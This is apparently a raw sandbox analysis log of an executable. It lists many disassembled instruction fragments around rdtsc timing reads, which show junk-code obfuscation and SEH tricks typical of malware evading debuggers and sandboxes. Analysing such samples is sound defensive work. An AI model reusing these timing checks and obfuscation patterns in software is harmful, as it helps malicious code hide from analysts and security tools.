Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B3F1E second address: 10B3F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B4DD2 second address: 10B4DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B3F22 second address: 10B3F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B4DD8 second address: 10B4DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B3F26 second address: 10B3F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F132877E3ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B4DDF second address: 10B4E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F1328EC0DF8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F1328EC0E03h 0x00000029 push 00000000h 0x0000002b mov edi, dword ptr [ebp+122D2555h] 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D20D3h], edi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push ebx 0x0000003d jmp 00007F1328EC0DFDh 0x00000042 pop ebx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B3F38 second address: 10B3F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B6E0A second address: 10B6E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B60E1 second address: 10B6106 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F132877E3B7h 0x0000000c jmp 00007F132877E3B1h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B6E0E second address: 10B6E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B6106 second address: 10B610C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B6E18 second address: 10B6E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B6E1C second address: 10B6E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B6E2C second address: 10B6E36 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1328EC0DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B7004 second address: 10B700A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B700A second address: 10B7010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B8FB3 second address: 10B8FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B7010 second address: 10B7014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B8FB8 second address: 10B8FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jg 00007F132877E3A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B8FCC second address: 10B8FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F1328EC0DFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B8FD9 second address: 10B9047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 add edi, dword ptr [ebp+122D2671h] 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F132877E3A8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movzx edi, cx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F132877E3A8h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 call 00007F132877E3AFh 0x0000004c mov bx, 1EBDh 0x00000050 pop ebx 0x00000051 push eax 0x00000052 push edi 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B9047 second address: 10B904D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10B914B second address: 10B9157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F132877E3ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BAF46 second address: 10BAF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BAF4F second address: 10BAF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BAF53 second address: 10BAF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BF075 second address: 10BF096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F132877E3A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BC2A5 second address: 10BC2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BD2E4 second address: 10BD2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BE2D7 second address: 10BE34D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d pop edi 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F1328EC0DF8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F1328EC0E07h 0x0000002e push dword ptr fs:[00000000h] 0x00000035 and bh, FFFFFFF8h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, dword ptr [ebp+122D2E36h] 0x00000045 mov eax, dword ptr [ebp+122D0B71h] 0x0000004b clc 0x0000004c push FFFFFFFFh 0x0000004e mov ebx, dword ptr [ebp+122D3692h] 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BB195 second address: 10BB19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C0223 second address: 10C0246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F1328EC0E00h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BC2A9 second address: 10BC2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C1110 second address: 10C11BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F1328EC0E09h 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1C30h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F1328EC0DF8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007F1328EC0DFDh 0x00000034 mov di, dx 0x00000037 jmp 00007F1328EC0E09h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F1328EC0DF8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 ja 00007F1328EC0DF9h 0x0000005e xchg eax, esi 0x0000005f jc 00007F1328EC0E08h 0x00000065 push eax 0x00000066 push edx 0x00000067 jo 00007F1328EC0DF6h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BE34D second address: 10BE351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BB19C second address: 10BB1A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BC2AF second address: 10BC2D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F132877E3B9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C11BF second address: 10C11CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1328EC0DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BE351 second address: 10BE35B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F132877E3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10BB1A1 second address: 10BB1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1328EC0DFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C1322 second address: 10C133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F132877E3B3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C133C second address: 10C13DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F1328EC0DF8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov bx, 220Bh 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov dword ptr [ebp+122D30C2h], edx 0x0000003c jl 00007F1328EC0E09h 0x00000042 jmp 00007F1328EC0E03h 0x00000047 mov eax, dword ptr [ebp+122D1195h] 0x0000004d js 00007F1328EC0DFCh 0x00000053 mov dword ptr [ebp+122D1BB1h], edi 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebx 0x0000005e call 00007F1328EC0DF8h 0x00000063 pop ebx 0x00000064 mov dword ptr [esp+04h], ebx 0x00000068 add dword ptr [esp+04h], 0000001Bh 0x00000070 inc ebx 0x00000071 push ebx 0x00000072 ret 0x00000073 pop ebx 0x00000074 ret 0x00000075 mov dword ptr [ebp+122D209Eh], ebx 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 push ebx 0x00000081 pop ebx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C13DF second address: 10C13F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10C5339 second address: 10C533F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CB0DC second address: 10CB104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F132877E3B0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CB3CE second address: 10CB3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CB3D2 second address: 10CB3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F132877E3B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F132877E3A8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CB3F9 second address: 10CB40F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1328EC0DF6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jl 00007F1328EC0E14h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CB40F second address: 10CB415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CF329 second address: 10CF33B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 je 00007F1328EC0E1Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CF33B second address: 10CF34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F132877E3A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10CF34E second address: 10CF352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D25D6 second address: 10D25F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D25F3 second address: 10D25FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D27C4 second address: 10D2801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F132877E3B3h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D89BF second address: 10D89C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D8B50 second address: 10D8B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F132877E3B4h 0x0000000e jmp 00007F132877E3B0h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D8B7E second address: 10D8BA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 jmp 00007F1328EC0DFAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1328EC0E04h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D8BA8 second address: 10D8BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D8D08 second address: 10D8D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D8D0E second address: 10D8D32 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F132877E3BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F132877E3A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10D8D32 second address: 10D8D44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0DFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10DE99D second address: 10DE9A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E3AFE second address: 10E3B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E28CA second address: 10E28D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E28D1 second address: 10E28E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1328EC0DFBh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F1328EC0DF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E25AB second address: 10E25D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F132877E3A6h 0x0000000c popad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F132877E3ABh 0x00000019 jmp 00007F132877E3AAh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E25D6 second address: 10E25E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1328EC0DFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E33CA second address: 10E33D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E33D8 second address: 10E33DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E3550 second address: 10E3554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E8E8F second address: 10E8E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E8E95 second address: 10E8E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E8E9A second address: 10E8EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E7A5C second address: 10E7A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E7A63 second address: 10E7A7B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1328EC0DF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F1328EC0E04h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E7D10 second address: 10E7D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3ADh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F132877E3A8h 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 10E8154 second address: 10E815A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
